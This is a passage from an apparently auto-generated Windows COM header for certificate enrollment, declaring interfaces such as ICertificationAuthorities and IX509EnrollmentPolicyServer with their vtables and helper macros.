/* interface IX509CertificateTemplateWritable */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateTemplateWritable;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("F49466A7-395A-4e9e-B6E7-32B331600DC0")
    IX509CertificateTemplateWritable : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Commit( 
            /* [in] */ CommitTemplateFlags commitFlags,
            /* [in] */ __RPC__in BSTR strServerContext) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Property( 
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [in] */ VARIANT value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Template( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509CertificateTemplateWritableVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateTemplateWritable * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateTemplateWritable * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateTemplateWritable * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *Commit )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ CommitTemplateFlags commitFlags,
            /* [in] */ __RPC__in BSTR strServerContext);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Property )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [in] */ enum EnrollmentTemplateProperty property,
            /* [in] */ VARIANT value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Template )( 
            __RPC__in IX509CertificateTemplateWritable * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplate **ppValue);
        
        END_INTERFACE
    } IX509CertificateTemplateWritableVtbl;

    interface IX509CertificateTemplateWritable
    {
        CONST_VTBL struct IX509CertificateTemplateWritableVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateTemplateWritable_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateTemplateWritable_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateTemplateWritable_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateTemplateWritable_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateTemplateWritable_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateTemplateWritable_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateTemplateWritable_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateTemplateWritable_Initialize(This,pValue)	\
    ( (This)->lpVtbl -> Initialize(This,pValue) ) 

#define IX509CertificateTemplateWritable_Commit(This,commitFlags,strServerContext)	\
    ( (This)->lpVtbl -> Commit(This,commitFlags,strServerContext) ) 

#define IX509CertificateTemplateWritable_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#define IX509CertificateTemplateWritable_put_Property(This,property,value)	\
    ( (This)->lpVtbl -> put_Property(This,property,value) ) 

#define IX509CertificateTemplateWritable_get_Template(This,ppValue)	\
    ( (This)->lpVtbl -> get_Template(This,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509CertificateTemplateWritable_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0067 */
/* [local] */ 

typedef 
enum EnrollmentCAProperty
    {	CAPropCommonName	= 1,
	CAPropDistinguishedName	= ( CAPropCommonName + 1 ) ,
	CAPropSanitizedName	= ( CAPropDistinguishedName + 1 ) ,
	CAPropSanitizedShortName	= ( CAPropSanitizedName + 1 ) ,
	CAPropDNSName	= ( CAPropSanitizedShortName + 1 ) ,
	CAPropCertificateTypes	= ( CAPropDNSName + 1 ) ,
	CAPropCertificate	= ( CAPropCertificateTypes + 1 ) ,
	CAPropDescription	= ( CAPropCertificate + 1 ) ,
	CAPropWebServers	= ( CAPropDescription + 1 ) ,
	CAPropSiteName	= ( CAPropWebServers + 1 ) ,
	CAPropSecurity	= ( CAPropSiteName + 1 ) ,
	CAPropRenewalOnly	= ( CAPropSecurity + 1 ) 
    } 	EnrollmentCAProperty;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0067_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0067_v0_0_s_ifspec;

#ifndef __ICertificationAuthority_INTERFACE_DEFINED__
#define __ICertificationAuthority_INTERFACE_DEFINED__

/* interface ICertificationAuthority */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificationAuthority;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("835D1F61-1E95-4bc8-B4D3-976C42B968F7")
    ICertificationAuthority : public IDispatch
    {
    public:
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Property( 
            /* [in] */ enum EnrollmentCAProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertificationAuthorityVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificationAuthority * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificationAuthority * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificationAuthority * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificationAuthority * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Property )( 
            __RPC__in ICertificationAuthority * This,
            /* [in] */ enum EnrollmentCAProperty property,
            /* [retval][out] */ __RPC__out VARIANT *pValue);
        
        END_INTERFACE
    } ICertificationAuthorityVtbl;

    interface ICertificationAuthority
    {
        CONST_VTBL struct ICertificationAuthorityVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificationAuthority_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificationAuthority_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificationAuthority_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificationAuthority_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificationAuthority_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificationAuthority_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificationAuthority_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificationAuthority_get_Property(This,property,pValue)	\
    ( (This)->lpVtbl -> get_Property(This,property,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificationAuthority_INTERFACE_DEFINED__ */


#ifndef __ICertificationAuthorities_INTERFACE_DEFINED__
#define __ICertificationAuthorities_INTERFACE_DEFINED__

/* interface ICertificationAuthorities */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertificationAuthorities;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79005-2181-11da-b2a4-000e7bbb2b09")
    ICertificationAuthorities : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICertificationAuthority *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ComputeSiteCosts( void) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **ppValue) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct ICertificationAuthoritiesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertificationAuthorities * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertificationAuthorities * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertificationAuthorities * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertificationAuthorities * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICertificationAuthorities * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICertificationAuthorities * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in_opt ICertificationAuthority *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICertificationAuthorities * This);
        
        HRESULT ( STDMETHODCALLTYPE *ComputeSiteCosts )( 
            __RPC__in ICertificationAuthorities * This);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICertificationAuthorities * This,
            /* [in] */ __RPC__in BSTR strName,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthority **ppValue);
        
        END_INTERFACE
    } ICertificationAuthoritiesVtbl;

    interface ICertificationAuthorities
    {
        CONST_VTBL struct ICertificationAuthoritiesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertificationAuthorities_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertificationAuthorities_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertificationAuthorities_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertificationAuthorities_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertificationAuthorities_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertificationAuthorities_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertificationAuthorities_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertificationAuthorities_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICertificationAuthorities_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICertificationAuthorities_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICertificationAuthorities_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICertificationAuthorities_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICertificationAuthorities_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICertificationAuthorities_ComputeSiteCosts(This)	\
    ( (This)->lpVtbl -> ComputeSiteCosts(This) ) 

#define ICertificationAuthorities_get_ItemByName(This,strName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strName,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertificationAuthorities_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0069 */
/* [local] */ 

typedef /* [public][public] */ 
enum __MIDL___MIDL_itf_certenroll_0000_0069_0001
    {	LoadOptionDefault	= 0,
	LoadOptionCacheOnly	= 1,
	LoadOptionReload	= 2,
	LoadOptionRegisterForADChanges	= 4
    } 	X509EnrollmentPolicyLoadOption;


enum EnrollmentPolicyFlags
    {	DisableGroupPolicyList	= 0x2,
	DisableUserServerList	= 0x4
    } ;
typedef 
enum PolicyServerUrlPropertyID
    {	PsPolicyID	= 0,
	PsFriendlyName	= ( PsPolicyID + 1 ) 
    } 	PolicyServerUrlPropertyID;

typedef 
enum X509EnrollmentPolicyExportFlags
    {	ExportTemplates	= 0x1,
	ExportOIDs	= 0x2,
	ExportCAs	= 0x4
    } 	X509EnrollmentPolicyExportFlags;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0069_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0069_v0_0_s_ifspec;

#ifndef __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__
#define __IX509EnrollmentPolicyServer_INTERFACE_DEFINED__

/* interface IX509EnrollmentPolicyServer */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509EnrollmentPolicyServer;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("13b79026-2181-11da-b2a4-000e7bbb2b09")
    IX509EnrollmentPolicyServer : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in BSTR bstrPolicyServerUrl,
            /* [in] */ __RPC__in BSTR bstrPolicyServerId,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ VARIANT_BOOL fIsUnTrusted,
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE LoadPolicy( 
            /* [in] */ X509EnrollmentPolicyLoadOption option) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetTemplates( 
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplates **pTemplates) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAsForTemplate( 
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCAs( 
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Validate( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCustomOids( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppObjectIds) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetNextUpdateTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetLastUpdateTime( 
            /* [retval][out] */ __RPC__out DATE *pDate) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerUrl( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetPolicyServerId( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetFriendlyName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetIsDefaultCEP( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetUseClientId( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAllowUnTrustedCA( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCachePath( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetCacheDir( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetAuthFlags( 
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetCredential( 
            /* [in] */ LONG hWndParent,
            /* [in] */ X509EnrollmentAuthFlags flag,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE QueryChanges( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeImport( 
            /* [in] */ VARIANT val) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Export( 
            /* [in] */ X509EnrollmentPolicyExportFlags exportFlags,
            /* [retval][out] */ __RPC__out VARIANT *pVal) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Cost( 
            /* [retval][out] */ __RPC__out DWORD *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Cost( 
            /* [in] */ DWORD value) = 0;
        
    };
    
#else 	/* C style interface */

    typedef struct IX509EnrollmentPolicyServerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            __RPC__deref_out  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509EnrollmentPolicyServer * This,
            /* [in] */ DISPID dispIdMember,
            /* [in] */ REFIID riid,
            /* [in] */ LCID lcid,
            /* [in] */ WORD wFlags,
            /* [out][in] */ DISPPARAMS *pDispParams,
            /* [out] */ VARIANT *pVarResult,
            /* [out] */ EXCEPINFO *pExcepInfo,
            /* [out] */ UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in BSTR bstrPolicyServerUrl,
            /* [in] */ __RPC__in BSTR bstrPolicyServerId,
            /* [in] */ X509EnrollmentAuthFlags authFlags,
            /* [in] */ VARIANT_BOOL fIsUnTrusted,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        HRESULT ( STDMETHODCALLTYPE *LoadPolicy )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ X509EnrollmentPolicyLoadOption option);
        
        HRESULT ( STDMETHODCALLTYPE *GetTemplates )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateTemplates **pTemplates);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAsForTemplate )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [in] */ __RPC__in_opt IX509CertificateTemplate *pTemplate,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAs )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt ICertificationAuthorities **ppCAs);
        
        HRESULT ( STDMETHODCALLTYPE *Validate )( 
            __RPC__in IX509EnrollmentPolicyServer * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetCustomOids )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectIds **ppObjectIds);
        
        HRESULT ( STDMETHODCALLTYPE *GetNextUpdateTime )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastUpdateTime )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out DATE *pDate);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerUrl )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetPolicyServerId )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetFriendlyName )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetIsDefaultCEP )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetUseClientId )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAllowUnTrustedCA )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCachePath )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCacheDir )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetAuthFlags )( 
            __RPC__in IX509EnrollmentPolicyServer * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetCredential )( 
